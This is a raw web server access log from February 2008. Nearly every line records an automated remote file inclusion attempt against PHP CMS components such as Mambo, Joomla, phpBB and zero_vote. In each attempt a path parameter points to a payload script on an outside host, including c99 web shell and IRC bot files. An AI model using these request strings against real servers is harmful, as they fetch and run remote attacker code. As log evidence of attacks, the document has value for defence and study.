59.106.19.18 - - [10/Feb/2008:04:00:26 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [10/Feb/2008:04:00:26 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [10/Feb/2008:04:00:26 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.176.141.31 - - [10/Feb/2008:04:00:55 -0800] "GET /logs/access_071228.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.141.31 - - [10/Feb/2008:04:00:56 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.141.31 - - [10/Feb/2008:04:00:56 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.192.212 - - [10/Feb/2008:04:01:07 -0800] "GET /logs/access_080130.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.25.34 - - [10/Feb/2008:04:01:57 -0800] "GET ////administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
65.98.25.34 - - [10/Feb/2008:04:01:58 -0800] "GET /logs////administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.119.158.50 - - [10/Feb/2008:04:02:32 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://hornydate.co.uk/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.109.165.53 - - [10/Feb/2008:04:02:40 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.151.215 - - [10/Feb/2008:04:03:38 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.215 - - [10/Feb/2008:04:03:38 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.215 - - [10/Feb/2008:04:03:38 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.189.57.6 - - [10/Feb/2008:04:05:03 -0800] "GET /logs/access_080121.log//addpost_newpoll.php?addpoll=preview&thispath=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.189.57.6 - - [10/Feb/2008:04:05:03 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.189.57.6 - - [10/Feb/2008:04:05:04 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.19.235 - - [10/Feb/2008:04:05:40 -0800] "GET /megumi/?M=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.37.18.76 - - [10/Feb/2008:04:05:50 -0800] "GET /logs/access_071228.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.37.18.76 - - [10/Feb/2008:04:05:51 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.37.18.76 - - [10/Feb/2008:04:05:52 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.217.62.202 - - [10/Feb/2008:04:05:52 -0800] "GET /logs/access_071228.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.217.62.202 - - [10/Feb/2008:04:05:52 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.217.62.202 - - [10/Feb/2008:04:05:53 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.158.50 - - [10/Feb/2008:04:05:55 -0800] "GET //skin/zero_vote/error.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.109.165.53 - - [10/Feb/2008:04:06:09 -0800] "GET //skin/zero_vote/error.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.168.15.147 - - [10/Feb/2008:04:06:32 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://zzpx.com/files/doceboLms/.shared/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.189.57.6 - - [10/Feb/2008:04:07:06 -0800] "GET /logs/access_071224.log//addpost_newpoll.php?addpoll=preview&thispath=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.217.247.166 - - [10/Feb/2008:04:07:30 -0800] "GET /logs/access_080130.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.237.143 - - [10/Feb/2008:04:11:55 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [10/Feb/2008:04:11:55 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [10/Feb/2008:04:11:55 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [10/Feb/2008:04:11:55 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [10/Feb/2008:04:11:55 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [10/Feb/2008:04:11:56 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.19.18 - - [10/Feb/2008:04:12:54 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:04:14:30 -0800] "GET /logs/access_080120.log//addpost_newpoll.php?addpoll=preview&thispath=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:04:14:30 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:04:14:31 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:15:23 -0800] "GET /logs/access_080120.log//myfunctions/mygallerybrowser.php?myPath=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.124.84 - - [10/Feb/2008:04:15:27 -0800] "GET /logs/access_071228.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.124.84 - - [10/Feb/2008:04:15:27 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.237.136.246 - - [10/Feb/2008:04:15:28 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.124.84 - - [10/Feb/2008:04:15:31 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.149 - - [10/Feb/2008:04:16:51 -0800] "GET /logs/access_071103.log HTTP/1.0" 200 57650 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.159.88.26 - - [10/Feb/2008:04:17:28 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.159.88.26 - - [10/Feb/2008:04:17:30 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.159.88.26 - - [10/Feb/2008:04:17:32 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.161.218 - - [10/Feb/2008:04:18:09 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://rajakoya.freehostia.com/folder/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [10/Feb/2008:04:18:09 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://rajakoya.freehostia.com/folder/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [10/Feb/2008:04:18:09 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://rajakoya.freehostia.com/folder/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:04:18:32 -0800] "GET /logs/access_080121.log//addpost_newpoll.php?addpoll=preview&thispath=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.152.104 - - [10/Feb/2008:04:18:47 -0800] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [10/Feb/2008:04:18:55 -0800] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.53 - - [10/Feb/2008:04:19:08 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:19:23 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:19:29 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:19:29 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:19:29 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.158.50 - - [10/Feb/2008:04:19:29 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:21:04 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:21:04 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:21:04 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.158.50 - - [10/Feb/2008:04:21:07 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [10/Feb/2008:04:21:08 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:21:16 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:21:16 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:21:16 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:21:16 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:21:16 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:21:16 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.165.53 - - [10/Feb/2008:04:21:27 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.53 - - [10/Feb/2008:04:21:27 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.80.58 - - [10/Feb/2008:04:21:28 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.80.58 - - [10/Feb/2008:04:21:28 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.80.58 - - [10/Feb/2008:04:21:28 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.79.52 - - [10/Feb/2008:04:21:40 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.52 - - [10/Feb/2008:04:21:40 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.52 - - [10/Feb/2008:04:21:40 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.158.50 - - [10/Feb/2008:04:22:08 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.226.209.72 - - [10/Feb/2008:04:22:34 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.226.209.72 - - [10/Feb/2008:04:22:34 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.161.218 - - [10/Feb/2008:04:23:00 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://rajakoya.freehostia.com/folder/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [10/Feb/2008:04:23:00 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://rajakoya.freehostia.com/folder/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [10/Feb/2008:04:23:00 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://rajakoya.freehostia.com/folder/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.79.52 - - [10/Feb/2008:04:23:05 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.52 - - [10/Feb/2008:04:23:05 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.52 - - [10/Feb/2008:04:23:05 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.165.53 - - [10/Feb/2008:04:23:06 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.59.15.100 - - [10/Feb/2008:04:23:06 -0800] "GET /logs/access_071228.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.59.15.100 - - [10/Feb/2008:04:23:10 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:23:15 -0800] "GET /logs/access_080106.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.59.15.100 - - [10/Feb/2008:04:23:18 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.80.58 - - [10/Feb/2008:04:23:42 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.80.58 - - [10/Feb/2008:04:23:42 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.80.58 - - [10/Feb/2008:04:23:42 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:24:18 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:24:18 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.130.218 - - [10/Feb/2008:04:24:18 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.77.89 - - [10/Feb/2008:04:24:24 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.77.89 - - [10/Feb/2008:04:24:24 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.77.89 - - [10/Feb/2008:04:24:24 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.171.143.11 - - [10/Feb/2008:04:24:36 -0800] "GET //myfunctions/mygallerybrowser.php?myPath=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.94.1.95 - - [10/Feb/2008:04:24:40 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.94.1.95 - - [10/Feb/2008:04:24:40 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.94.1.95 - - [10/Feb/2008:04:24:41 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.159.88.26 - - [10/Feb/2008:04:26:18 -0800] "GET /logs/access_080106.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.159.88.26 - - [10/Feb/2008:04:26:27 -0800] "GET /logs/access_071230.log//popup_window.php?site_isp_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.159.88.26 - - [10/Feb/2008:04:26:28 -0800] "GET //popup_window.php?site_isp_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.159.88.26 - - [10/Feb/2008:04:26:31 -0800] "GET /logs//popup_window.php?site_isp_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.152.104 - - [10/Feb/2008:04:26:47 -0800] "GET /logs/access_080201.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [10/Feb/2008:04:26:47 -0800] "GET /logs/access_080201.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [10/Feb/2008:04:26:47 -0800] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [10/Feb/2008:04:26:47 -0800] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.238.201.74 - - [10/Feb/2008:04:26:59 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.238.201.74 - - [10/Feb/2008:04:26:59 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.238.201.74 - - [10/Feb/2008:04:26:59 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
